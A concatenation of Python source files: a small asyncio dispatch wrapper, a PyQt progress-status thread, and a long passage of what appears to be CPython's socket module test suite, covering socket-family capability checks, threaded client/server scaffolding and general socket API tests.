event_loop_executor = threading.Thread(target = lambda: global_event_loop.run_forever())
event_loop_executor.daemon = True
event_loop_executor.start()
class AsyncDispatchInfo(web.DispatchInfo):
def call(self, req):
if hasattr(self, "event_loop"):
t = self.event_loop
else:
t = global_event_loop
asyncio.run_coroutine_threadsafe(self.async_call(req), t)
async def async_call(self, req):
try:
await self.callback(req)
except Exception as e:
req.create_response().set_status(500).set_body(str(e)).send()
|
StatusThread.py
|
import threading
import time
from PyQt5 import QtCore
class StatusThread(QtCore.QObject):
UpdateProgressSignal = QtCore.pyqtSignal()
def __init__(self, HashThreadOne, HashThreadTwo):
super().__init__()
self.HashThreadOne = HashThreadOne
self.HashThreadTwo = HashThreadTwo
self.Thread = threading.Thread(target=self.run, daemon=True)
def start(self):
self.Thread.start()
def run(self):
while not self.HashThreadOne.HashComplete or not self.HashThreadTwo.HashComplete:
self.UpdateProgressSignal.emit()
time.sleep(0.25)
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import platform
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
# test unicode string and carriage return
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')
MAIN_TIMEOUT = 60.0
VSOCKPORT = 1234
AIX = platform.system() == "AIX"
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_qipcrtr():
"""Check whether AF_QIPCRTR sockets are supported on this host."""
try:
s = socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
@contextlib.contextmanager
def socket_setdefaulttimeout(timeout):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(timeout)
yield
finally:
socket.setdefaulttimeout(old_timeout)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_QIPCRTR = _have_socket_qipcrtr()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp().
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = support.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
support.bind_unix_socket(sock, path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
if socket.has_ipv6:
socket.AF_INET6
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testCrucialIpProtoConstants(self):
socket.IPPROTO_TCP
socket.IPPROTO_UDP
if socket.has_ipv6:
socket.IPPROTO_IPV6
@unittest.skipUnless(os.name == "nt", "Windows specific")
def testWindowsSpecificConstants(self):
socket.IPPROTO_ICLFXBM
socket.IPPROTO_ST
socket.IPPROTO_CBT
socket.IPPROTO_IGP
socket.IPPROTO_RDP
socket.IPPROTO_PGM
socket.IPPROTO_L2TP
socket.IPPROTO_SCTP
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [support.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInvalidInterfaceNameIndex(self):
# test nonexistent interface index/name
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
# test with invalid values
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as s:
self.assertEqual(s.gettimeout(), None)
# Set the default timeout to 10, and see if it propagates
with socket_setdefaulttimeout(10):
self.assertEqual(socket.getdefaulttimeout(), 10)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), 10)
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), None)
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
